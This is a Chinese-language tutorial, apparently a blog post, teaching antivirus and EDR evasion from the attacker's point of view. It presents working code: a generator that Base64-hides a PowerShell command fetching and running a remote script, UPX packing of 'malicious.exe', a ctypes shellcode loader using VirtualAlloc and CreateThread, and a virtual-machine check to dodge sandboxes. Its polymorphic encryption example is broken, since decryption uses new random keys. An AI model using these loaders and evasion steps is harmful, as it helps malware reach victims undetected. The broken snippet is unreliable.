一、从检测到对抗:免杀技术的攻防本质
假设你作为一名蓝队成员,在一次常规日志审查中发现了一个可疑的恶意样本。你将它上传到 VirusTotal 后,发现它已经被 20 多款杀毒引擎检测为恶意程序。然而几天后,同一个威胁再次出现,但这次它完美绕过了所有检测手段。攻击者是怎么做到的?免杀(Bypass AV/EDR)技术正是答案。
免杀是红队攻击中的核心技能之一,也是对抗蓝队的重要武器。一次精心设计的免杀策略,可能让攻击者的恶意载荷在目标环境中肆意横行数月甚至数年。本文将从攻击者的视角,深度解析如何实现免杀,展示从基础技巧到高级对抗的完整实战路径。
---
二、免杀的核心原理:绕过而非隐藏
在攻击过程中,杀毒软件和 EDR(终端检测响应)是攻击者的头号敌人。要理解免杀技术,首先需要知道它们是如何检测恶意样本的。杀毒引擎主要通过以下几种方式检测恶意软件:
- 特征匹配:通过查找特定的恶意代码签名或模式来标记威胁。
- 行为分析:观察程序运行时的行为,检测是否存在可疑操作,比如内存注入、键盘记录等。
- 静态分析:分析文件结构、PE(Portable Executable)头、导入的函数、加密特征等。
- 动态沙箱分析:在隔离环境中执行样本,观察其行为是否恶意。
- 机器学习检测:通过特征向量训练的模型来判断程序是否异常。
因此,免杀的核心目标是:
- 绕过特征匹配:通过修改代码、混淆特征等手段规避静态检测。
- 避开行为分析:规避关键操作或延迟恶意动作。
- 绕过沙箱检测:检测沙箱,避免在其环境中暴露恶意行为。
接下来,我们将逐步深入,从简单到复杂,展示完整的免杀技术。
---
三、环境搭建:免杀测试实验室
在开始免杀实战之前,你需要一个安全的测试环境,避免误操作导致恶意代码失控。以下是我的推荐配置:
- 攻击机:一台 Kali Linux 或 Parrot OS,用于开发免杀工具。
- 目标机:Windows 10 虚拟机,安装主流杀毒软件和 EDR(如 Windows Defender、SentinelOne)。
- 网络隔离:确保虚拟机网络设置为 Host-Only,避免恶意代码意外传播。
- 分析工具:
- PEStudio:用于静态分析二进制文件。
- Process Monitor:监控进程行为和系统调用。
- x64dbg:动态调试工具。
- Cuckoo Sandbox:用于沙箱检测。
以下是实验室网络拓扑示意图:
<pre><code>[ Kali Linux ] <---> [ Windows 10 VM ] (Host-Only Network)</code></pre>
> 注意:所有实验仅限在授权环境中进行,请勿在真实环境中运行恶意代码。
---
四、基础免杀:混淆与加壳
1. 特征混淆
最简单的免杀方法是修改恶意载荷的静态特征,比如字符串、PE 节点、函数导入表等。例如,我在一场红队渗透中使用了一款常见的反向 Shell payload,但由于它的特征已被杀毒引擎广泛收录,我选择通过简单的编码手段绕过检测。
以下是一个用 Python 编写的简单 Base64 加密的反向 Shell 示例:
<pre><code class="language-python">import base64 import os
原始的反向 Shell 代码
payload = """ powershell -NoP -NonI -W Hidden -Exec Bypass -Command \ "New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/shell.ps1') | IEX" """
对 payload 进行 Base64 编码
encoded_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
构造解码运行代码
template = f""" import base64, subprocess payload = base64.b64decode('{encoded_payload}'.encode('utf-8')).decode('utf-8') subprocess.call(payload, shell=True) """
保存为恶意脚本文件
with open("bypass_av.py", "w") as file: file.write(template)
print("[+] Bypass payload generated: bypass_av.py")</code></pre>
> 解读:上述代码通过 Base64 对原始 Payload 进行了编码,绕过了静态特征检测。实际运行时,Python 脚本会解码并执行恶意命令。
2. 加壳技术
加壳是将恶意代码封装在一个合法程序中,改变其文件结构。以下是使用 UPX 工具为二进制文件加壳的示例:
<pre><code class="language-bash"># 下载 UPX 工具 sudo apt-get install upx -y
使用 UPX 对恶意文件加壳
upx --best --lzma malicious.exe -o bypassed.exe
echo "[+] File packed successfully: bypassed.exe"</code></pre>
> 注意:虽然 UPX 是一个合法的压缩工具,但它也是免杀的常见手段之一。某些杀毒软件可能直接标记被加壳文件为可疑。
---
五、中级免杀:内存加载与反检测
1. 动态内存加载
很多杀毒引擎依赖文件特征进行检测,而动态内存加载可以完全避开文件分析。以下是一个通过 Python 实现的内存加载示例:
<pre><code class="language-python">import ctypes
恶意 Shellcode(以 msfvenom 生成的 payload 为例)
shellcode = bytearray( b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30..." )
分配内存
ptr = ctypes.windll.kernel32.VirtualAlloc(None, len(shellcode), 0x3000, 0x40)
写入 Shellcode
ctypes.windll.kernel32.RtlMoveMemory(ptr, shellcode, len(shellcode))
执行 Shellcode
ht = ctypes.windll.kernel32.CreateThread(None, 0, ptr, None, 0, None) ctypes.windll.kernel32.WaitForSingleObject(ht, -1)</code></pre>
> 解读:该代码通过调用 Windows API,将恶意 Shellcode 加载到内存中并执行,完全避免了杀毒引擎的文件扫描。
2. 策略反检测
一些 EDR 会通过检测 API 调用模式来发现恶意行为。在一次渗透测试中,我通过以下方法规避了某款顶级 EDR 的检测:
- 延迟执行:通过
time.sleep()延迟执行恶意操作,避开沙箱检测。 - 环境检测:检测是否运行在虚拟机或沙箱中,伪装为合法程序运行。
以下是一个检测虚拟机环境的示例代码:
<pre><code class="language-python">import subprocess
def check_vm(): result = subprocess.check_output("wmic bios get serialnumber", shell=True).decode() if "VMware" in result or "VirtualBox" in result: print("[!] Sandbox detected, exiting...") exit()
check_vm()</code></pre>
> 实战经验:在某些情况下,只需伪装或延迟几秒钟,就能成功绕过检测。
---
六、高级免杀:多态与流量伪装
1. 多态恶意代码
多态技术可以在每次生成恶意代码时改变其特征,从而绕过静态特征检测。以下是一个简单的多态加密示例:
<pre><code class="language-python">import random
原始恶意代码
payload = "print('This is malicious code')"
多态加密函数
def encrypt_code(code): encrypted = ''.join([chr(ord(c) ^ random.randint(1, 255)) for c in code]) return encrypted
解密并执行
encrypted_payload = encrypt_code(payload) exec("".join([chr(ord(c) ^ random.randint(1, 255)) for c in encrypted_payload]))</code></pre>
---
七、攻击者的免杀哲学
免杀不仅是技术,更是一种艺术。成功的免杀需要攻击者不断尝试和改进,并根据目标环境调整策略。以下是我个人的一些经验:
- 模块化开发:将免杀技术封装为模块,方便快速迭代。
- 实时测试:在目标环境中反复测试,确保免杀效果。
- 对抗思维:从防御者的角度思考,找到检测引擎的弱点。
合法声明:本文仅限于合法授权的安全测试环境,严禁用于非法用途!